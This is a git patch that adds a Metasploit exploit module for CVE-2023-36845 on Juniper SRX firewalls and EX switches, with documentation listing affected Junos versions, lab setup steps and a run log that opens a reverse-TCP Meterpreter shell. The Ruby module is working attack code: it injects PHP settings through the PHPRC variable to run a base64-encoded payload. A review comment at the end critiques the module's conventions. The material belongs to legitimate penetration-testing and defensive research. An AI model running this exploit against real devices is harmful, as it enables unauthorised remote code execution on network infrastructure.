From da8c020d14bfc6c4e6f3ab9347532b46686faa26 Mon Sep 17 00:00:00 2001
From: Jack Heysel
Date: Wed, 20 Sep 2023 16:47:05 -0400
Subject: [PATCH] Junos OS SRX and EX PHPRC Manipulation RCE
---
.../http/junos_phprc_auto_prepend_file.md | 137 ++++++++++++++++++
.../http/junos_phprc_auto_prepend_file.rb | 85 +++++++++++
2 files changed, 222 insertions(+)
create mode 100644 documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
create mode 100644 modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
diff --git a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
new file mode 100644
index 000000000000..8c1532626614
--- /dev/null
+++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -0,0 +1,137 @@
+## Vulnerable Application
+
+This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls
+and EX switches.
+
+Juniper Networks Junos OS affected SRX Series:
+
+- All versions prior to 20.4R3-S8.
+- 21.1 version 21.1R1 and later versions.
+- 21.2 versions prior to 21.2R3-S6.
+- 21.3 versions prior to 21.3R3-S5.
+- 21.4 versions prior to 21.4R3-S5.
+- 22.1 versions prior to 22.1R3-S3.
+- 22.2 versions prior to 22.2R3-S2.
+- 22.3 versions prior to 22.3R2-S2, 22.3R3.
+- 22.4 versions prior to 22.4R2-S1, 22.4R3.
+
+Juniper Networks Junos OS affected EX Series:
+
+- All versions prior to 20.4R3-S8.
+- 21.1 version 21.1R1 and later versions.
+- 21.2 versions prior to 21.2R3-S6.
+- 21.3 versions prior to 21.3R3-S5.
+- 21.4 versions prior to 21.4R3-S4.
+- 22.1 versions prior to 22.1R3-S3.
+- 22.2 versions prior to 22.2R3-S1.
+- 22.3 versions prior to 22.3R2-S2, 22.3R3.
+- 22.4 versions prior to 22.4R2-S1, 22.4R3.
+
+### Description
+
+The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin
+by opening `/dev/fd/0`. The exploit also makes use of two useful PHP features. The first being
+`auto_prepend_file` which causes the provided file to be added using the `require` function. The second PHP
+function is `allow_url_include` which allows the use of URL-aware `fopen` wrappers. By enabling
+`allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses
+`data://` to provide a file inline which includes the base64 encoded PHP payload.
+
+### Setup
+
+1. Navigate to the following URL: https://www.juniper.net/us/en/dm/download-next-gen-vsrx-firewall-trial.html
+1. Setup an account and download the free trail of: `junos-vsrx3-x86-64-20.2R1.10.scsi.ova`
+1. Boot
+1. Log in as `root` / no password
+1. Run `cli`
+1. Run `configure`
+1. Set password: `set system root-authentication plain-text-password`
+1. Set hostname: `set system host-name (host-name)`
+1. Set up the management interface: `set interfaces fxp0 unit 0 family inet dhcp-client`
+1. Set up the traffic interfaces: `set interfaces ge-0/0/0 unit 0 family inet dhcp-client`
+1. Set up security zones: `set security zones security-zone trust interfaces ge-0/0/0.0`
+1. Validate the config: `commit check`
+ - If you typo'd something, you can `rollback` here and try again
+1. Commit: `commit`
+1. Exit config, then exit CLI: `exit` then `exit`
+1. Reboot: `reboot`
+1. Log in with your new account
+1. Run `cli` again
+1.Get the ip address with `show interfaces terse | match fxp`
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use freebsd/http/junos_phprc_auto_prepend_file`
+1. Set the `RHOST`, `LHOST`
+1. Run the module
+1. Receive a Meterpreter session as the `nobody` user.
+
+## Scenarios
+
+### PHP Meterpreter junos-vsrx3-x86-64-20.2R1.10.scsi.ova
+
+```
+msf6> use freebsd/http/junos_phprc_auto_prepend_file
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
+
+Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS 192.168.0.247 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ SSLCert no Path to a custom SSL certificate (default is randomly generated)
+ URIPATH no The URI to use for this exploit (default is random)
+ VHOST no HTTP server virtual host
+
+
+ When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+ SRVPORT 8080 yes The local port to listen on.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 192.168.0.77 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+Exploit target:
+
+ Id Name
+ -- ----
+ 0 Junos OS SRX Firewall / EX Switch
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.0.247
+rhosts => 192.168.0.247
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.0.77
+lhost => 192.168.0.77
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run
+
+[*] Started reverse TCP handler on 192.168.0.77:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
+[*] Sending stage (39927 bytes) to 192.168.0.247
+[*] Meterpreter session 4 opened (192.168.0.77:4444 -> 192.168.0.247:58995) at 2023-09-20 16:27:04 -0400
+
+meterpreter > getuid
+Server username: nobody
+meterpreter > sysinfoi
+[-] Unknown command: sysinfoi
+meterpreter > sysinfo
+Computer : JUNOS
+OS : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun 7 23:59:18 PDT 2020 builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/
+Meterpreter : php/freebsd
+meterpreter >
+```
diff --git a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
new file mode 100644
index 000000000000..d68284285e18
--- /dev/null
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Junos OS PHPRC Environment Variable Manipulation RCE',
+ 'Description' => %q{
+ This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls
+ and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin
+ by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being
+ 'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP
+ function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling
+ allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses
+ data:// to provide a file inline which includes the base64 encoded PHP payload.
+ },
+ 'Author' => [
+ 'Jacob Baines', # Analysis
+ 'jheysel-r7', # Msf module
+ 'Ron Bowes' # Target setup instructions
+ ],
+ 'References' => [
+ [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'],
+ [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'],
+ [ 'CVE', '2023-36845']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'php',
+ 'Privileged' => false,
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [
+ ['Junos OS SRX Firewall / EX Switch', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2023-08-17',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE, ],
+ 'SideEffects' => [ ],
+ 'Reliability' => [ REPEATABLE_SESSION, ]
+ }
+ )
+ )
+ end
+
+ def check
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, '?LD_PRELOAD=/tmp/ld'),
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded'
+ )
+
+ return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"')
+
+ CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.')
+ end
+
+ def execute_command(cmd, _opts = {})
+ post_data = "allow_url_include=1\n"
+ post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\""
+
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0'),
+ 'method' => 'POST',
+ 'data' => post_data.to_s,
+ 'ctype' => 'application/x-www-form-urlencoded'
+ )
+
+ print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res
+ end
+
+ def exploit
+ execute_command(payload.encoded)
+ end
+end
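Review bot: `include Msf::Exploit::CmdStager` near the top of the hunk is dead weight — `exploit` hands `payload.encoded` (PHP source, `'Arch' => ARCH_PHP`) straight to `execute_command` and no `execute_cmdstager` call exists anywhere in the module, so the mixin only registers the CMDSTAGER::FLAVOR, SRVHOST and SRVPORT options that the accompanying documentation's `options` output shows and that have no effect here; delete the include (the `execute_command` name can stay). `'SideEffects' => [ ]` also looks wrong: both `check` (`?LD_PRELOAD=/tmp/ld`, matched on the `Cannot open "/tmp/ld"` error text) and `execute_command` (`?PHPRC=/dev/fd/0`) carry the trigger in the request line, which presumably ends up in the J-Web access log, so `'SideEffects' => [ IOC_IN_LOGS ]` is the honest declaration. In `execute_command`, `print_error(...) if res` only prints and then returns normally; framework convention is `fail_with(Failure::Unknown, 'The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res` so a failed run is reported as a failure instead of a silent return. Embedding the query string in the path argument of `normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0')` is unidiomatic and sidesteps the client's own query handling — `'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'PHPRC' => '/dev/fd/0' }` is the conventional form, and the same applies to the `LD_PRELOAD` probe in `check`.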